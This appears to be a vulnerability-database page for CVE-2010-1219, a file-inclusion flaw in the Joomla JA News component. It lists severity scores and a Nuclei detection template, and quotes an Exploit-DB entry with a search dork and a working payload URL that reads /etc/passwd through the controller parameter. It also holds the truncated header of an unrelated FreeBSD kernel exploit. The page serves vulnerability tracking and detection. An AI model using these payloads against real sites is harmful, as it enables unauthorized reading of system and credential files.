CVE-2010-1219
published 2010-03-30CVE-2010-1219: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot…
PriorityP340medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
8.27%
94.2th percentile
Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| com_janews | com_janews | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FreeBSD - 'mountnfs()' Denial of Service
exploitdb·2010-06-23
CVE-2010-2020 FreeBSD - 'mountnfs()' Denial of Service
FreeBSD - 'mountnfs()' Denial of Service
---
/*
* mountnfsex.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2.
*
* Discovered and exploited by Patroklos (argp) Argyroudis.
*
* The vulnerability is in mountnfs() which is reachable by the mount(2)
* and nmount(2) system calls. In order for them to be enabled for
* unprivileged users the sysctl(8) variable vfs.usermount must be set to
* a non-zero value.
*
* mountnfs() employs an insufficient input validation method for copying
* data passed in the struct nfs_args from userspace to kernel.
* Specifically, the file handle to be mounted (nfs_args.fh) and its size
* (nfs_args.fhsize) are completely user-controllable. In file
* sys/nfsclient/nfs_vfsops.c from 8.0-RELEASE:
*
* 1219 b
Exploit-DB
Joomla! Component com_janews - Local File Inclusion
exploitdb·2010-03-15
CVE-2010-1219 Joomla! Component com_janews - Local File Inclusion
Joomla! Component com_janews - Local File Inclusion
---
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_janews
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_janews"
####################################################################
===[ Exploit ]===
www.site.com/index.php?option=com_janews&controller=[LFI]
www.site.com/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
####################################################################
Nuclei
Joomla! Component com_janews - Local File Inclusion
nuclei·CVSS 6.8
CVE-2010-1219 [MEDIUM] Joomla! Component com_janews - Local File Inclusion
Joomla! Component com_janews - Local File Inclusion
A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: Upgrade to the latest version to miti
http://secunia.com/advisories/38952http://www.exploit-db.com/exploits/11757http://www.securityfocus.com/bid/38746https://exchange.xforce.ibmcloud.com/vulnerabilities/56901http://secunia.com/advisories/38952http://www.exploit-db.com/exploits/11757http://www.securityfocus.com/bid/38746https://exchange.xforce.ibmcloud.com/vulnerabilities/56901
2010-03-30
Published